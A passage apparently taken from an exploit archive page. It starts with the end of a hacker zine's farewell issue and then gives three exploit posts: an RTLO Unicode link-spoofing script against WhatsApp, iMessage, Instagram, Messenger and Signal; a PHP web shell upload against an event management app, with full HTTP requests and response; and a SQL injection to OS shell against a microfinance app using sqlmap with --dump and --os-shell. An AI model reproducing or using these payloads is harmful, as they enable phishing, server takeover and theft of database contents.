PLANET!")<br />print(" HACK THE PLANET!")<br />print(" HACK THE PLANET!")<br />print(" HACK THE PLANET!")<br />print(" HACK THE PLANET!")<br />print(" HACK THE PLANET!\n\n")<br /><br />text='''<br />$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@<br /><br /> ⣀⣤⣶⣶⡶<br /> ⣀⢴⣿⣿⣿⡿⠏<br /> ⢀⢔⣾⣾⣿⣿⠟⠟<br /> ⣠⣔⣽⣿⣿⣹⣿⡏⡌<br /> ⢀⣀⣀⢠⣤⣤⣤⣤⣤⣴⣿⣿⣿⣿⠏ ⣿⣿⣷⠆ ⣀⡠⣤⣶⣖⣛⣛⣻⣿⣿⣿⣿⣷⣶⡾⠛⠁<br /> ⣀⣤⣤⣶⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣤⣄⡉⠉⠙ ⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣟⢿⣿⣿⣏ ⢄<br /> ⢠⢖⣽⣿⠟⡉ ⢀⣄⡹⣿⣿⣿⣿⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣿⣿⣿⣴⣿⣿⣲⣄<br /> ⣰⣻⣿⣿⣗⣉⣠⣤⠾⠿⠿⣿⣿⣿⣿⢣⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠿⠿⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣆⣀<br /> ⣿⣿⣿⣿⣿⣿⡿⠋⢀⠔ ⠈⠛⢿⣿⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠏ ⢀⣀⣀⡀ ⣸⡿⠟⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣮⣖⣤⡀ ⢀⣠⣤⣰⣶⠶⠄<br /> ⣿⣿⣿⣿⣿⡿⠃⠴⠥⠤⠤⠤⠤⢀⡉⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⠋ ⠛⠛⠛⢉⡉⣶⣾⣷⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣟⣻⣿⣿⣿⣿⣿⣿⣶⣦⣀ ⣠⣶⣿⣿⣿⣿⣟⡀<br /> ⢿⠿⠿⠿⠗⠔⠁ ⠈⠿⣮⣟⣿⣿⣿⣿⣿⣻⣏ ⠤⠐⠉ ⢿⣿⣿⣿⣿⣧⡈⠛⠿⠿⢿⣿⣿⣿⣿⣿⣿⣿⣏⠉⢁⣘⠹⠿⠿⠿⠿⠿⠿⠿⠶⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣄⡀<br /> ⣿⣿⣿⡟⢿⣿⣿⣿⣿ ⠙⠛⢿⣿⣿⣿ ⠈⠙⢿⣿⣿⣿⡆ ⠈⠉⠁ ⠈⠉⠉⠉ ⠙⠛⠛⠛⠛⠿⠛⠛⠛⠛<br /> ⢀⣾⣿⣿⠏ ⢸⣿⣿⣿⠇ ⣀⣴⣿⣿⡟ ⢈⣿⣿⣿⣿<br /> ⢀⣴⣿⣿⣿⠏ ⢀⣿⣿⣿⠏ ⢀⣾⣿⣿⣿⣿⠃ ⢰⣟⡿⣿⣿⣿⣿⡇<br /> ⣠⣴⣿⣿⣿⡿⠃⢀⣶⣿⣿⣿⣿ ⠈⠉⠁⠈⠉⠁ ⠈⠘⠂⢿⠘⣿⠋<br /> ⠋⠉⠉⠉⠉ ⣜⣻⣿⣿⣿⣿⠏<br /> ⠸⠋⠿⠋<br /><br /><br />-o==[=====> GOODBYE <=====]==o-<br />This is the last issue of KoN, at least in its current format. Lets be honest<br />there is only so much you can do with phishing tools unless you target the<br />shoddy corporate ones run by retired criminals and we're not zf0.<br />Shout out to everyone who inspired, contributed and supported us, they are too<br />many to mention, but especially @mubix, @laughing_mantis and @hackerscurator<br /><br />So long, and thanks for all the phish!!!! !!<br /><br /><br />-o==[=====> SIG <=====]==o-<br />0034003200b153e3007653d825a89b24309761747489079a3982b3dc27d45c0146800237c3097651<br />b46d07be340034003200373ed0fa2bb4c022919d5c6c6c6d17327284cc7e3f642ebf19c371f15297<br />aaddf58f56389247bbbd0034003200a965f98db196490071fcc90292201721e3cb442e4164616d73<br />b6c417378dfcd82900ac2cf080d87c0034003200469fd63fd5f7fc590ffdc40e161d2b8b60937a39<br />60f33318b95bb1fccbbadc72af21f9e4f3928d4e0034003200158650bf32791bf8e2eba5de614fd6<br />c9e1a02ed591190450086e688364e9b777b4bfb6cfc06dab03003400320071c36fc094a0303ae81b<br />7c4bd57815d25f4c3febba5fd73e81f434fd0184f89ba8edfdcc69a57b520034003200291f55b92b<br />225049725dd6a99297c808db137243da077f82f456539e8c3c545f491c0336b2e15083bb0f47d478<br />'''<br /><br /></code></pre>
<pre><code># Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096<br /># Date: 24/03/2022<br /># Exploit Authors: zadewg & Sick Codes<br /># Vendor Homepage: https://www.meta.com<br /># Vendor Homepage: https://www.instagram.com<br /># Vendor Homepage: https://www.apple.com<br /># Vendor Homepage: https://www.signal.org<br /># Tested on: Whatsapp iOS<br /># Version 2.19.80 and below<br /># Tested on: Whatsapp Android <br /># Version 2.19.222 and below<br /># Tested on: Instagram iOS<br /># Version: 106.0 and below<br /># Tested on: Instagram iOS Android 107.0.0.11<br /># Version: 107.0.0.11 and below<br /># Tested on: iMessage (Messages app)<br /># Version: iOS 14.3 and below<br /># Tested on: Facebook Messenger app iOS<br /># Version: 227.0 and below<br /># Tested on: Facebook Messenger app Android <br /># Version: 228.1.0.10.116 and below<br /># Tested on: Signal<br /># Version: 5.33.0.25 and below<br /># CVE: CVE-2020-20093<br /># CVE: CVE-2020-20094<br /># CVE: CVE-2020-20095<br /># CVE: CVE-2020-20096<br /><br /><br />#!/bin/bash<br /># Author: sickcodes<br /># Contact: https://twitter.com/sickcodes https://github.com/sickcodes<br /># Copyright: sickcodes (C) 2022<br /># License: GPLv3+<br /><br /># References: https://github.com/zadewg/RIUS<br /># https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh<br /># https://sick.codes/sick-2022-40<br /><br /><br />APPEAR_AS='https://google.com'<br /><br /><br />DESTINATION='bit.ly/3ixIRwm'<br /><br /><br />printf "\n\n${APPEAR_AS}/\u202E${DESTINATION}\n\n"<br /><br /><br /># copy paste into any of the above apps.<br /># victim will see a surreptitious link<br /><br /><br /># works on latest Signal (unpatched)<br /></code></pre>
<pre><code># Title: Event Management System 1.0 Shell Upload<br /># Author: Hejap Zairy<br /># Date: 24.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br />registered user can bypass waf upload .php.png files in attachments section with use of intercept tool in burbsuite to edit the raw<br /><br /><br />#vulnerability Code php<br />Needs more filtering to upload profile files<br /><br />php```<br /> if(isset($_POST['submit']))<br />{<br /> $adminid=$_SESSION['odmsaid'];<br /> $productname=$_POST['productName'];<br /> $productimage1=$_FILES["productimage1"]["name"];<br /> move_uploaded_file($_FILES["productimage1"]["tmp_name"],"assets/img/profileimages/".$_FILES["productimage1"]["name"]);<br /> $sql="update tbladmin set Photo=:productimage1 where ID=:aid";<br /> $query = $dbh->prepare($sql);<br /> $query->bindParam(':productimage1',$productimage1,PDO::PARAM_STR);<br /> $query->bindParam(':aid',$pid,PDO::PARAM_STR);<br /> $query->execute();<br /> $_SESSION['msg']="profile Image Updated Successfully !!";<br /> }<br /> ?><br />```<br /><br /><br />[+] Payload POST<br /><br /><br />```<br />POST /scbs/?p=manage_account HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------409902128312379197203124536738<br />Content-Length: 882<br />Origin: https://0day.gov<br />Referer: https://0day.gov/scbs/<br />Upgrade-Insecure-Requests: 1<br />Te: trailers<br />Connection: close<br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productName"<br />Hejap Zairy<br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productimage1"; filename="0day_hejap.php"<br />Content-Type: image/png<br /><br /><?=`$_GET[515]`?><br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="submit"<br />-----------------------------409902128312379197203124536738--<br />```<br /><br /><br />#Status: CRITICAL<br /><br />[+] Payload GET<br /><br />```<br />GET /Royal%20Event/royal_event/assets/img/profileimages/0day_hejap.php?515=echo+Hejap+Zairy HTTP/1.1<br /><br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=pqbgvck1gedt9if6p582nt9a41<br />Upgrade-Insecure-Requests: 1<br /><br /><br /><br /><br />```<br /><br />#Response <br />```<br />HTTP/1.1 200 OK<br />Date: Thu, 24 Mar 2022 11:15:56 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Content-Length: 12<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />Hejap Zairy<br />```<br /><br /><br /># Description:<br />The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers.<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/Q85LFQy.png<br />https://i.imgur.com/w7B8uAf.png<br /><br /></code></pre>
<pre><code># Title: Microfinance Management System 1.0 SQLi To Rce<br /># Author: Hejap Zairy<br /># Date: 24.07.2022<br /># Vendor: https://www.sourcecodester.com/php/14822/microfinance-management-system.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /><br />#vulnerability Code php<br /><br />```php<br /> <?php<br /> $sql = "SELECT count(*) AS total_account FROM account_type";<br /> $result = mysqli_query($conn, $sql);<br /> $data = mysqli_fetch_assoc($result);<br /> ?><br /> }<br />```<br /><br /><br /><br /><br />#Status: CRITICAL<br />```<br />GET parameter 'account_type_number' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y<br />sqlmap identified the following injection point(s) with a total of 147 HTTP(s) requests:<br />---<br />Parameter: account_type_number (GET)<br /> Type: UNION query<br /> Title: MySQL UNION query (random number) - 3 columns<br /> Payload: account_type_number=-6015' UNION ALL SELECT 7366,CONCAT(0x716b626b71,0x4268666c6b715274794a58534f487366546e5379414951584a684459764f424451536f5a707a6a6a,0x7170707a71),7366#<br />---<br /><br />```<br />#SQLi Time to Rce<br />#ُExploit <br /><br /><br />sqlmap -u 'http://0day.gov/mims/updateaccount_type.php?account_type_number=6015' --hex --time-sec=17 --dbms=mysql --technique=u --random-agent --eta -p account_type_number -D mims -T users --dump --os-shell <br /><br /># Description:<br />The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc<br /><br /># Proof and Exploit:<br />https://i.imgur.com/kRcQmxO.png<br />https://i.imgur.com/4RmKSom.png<br /><br /></code></pre>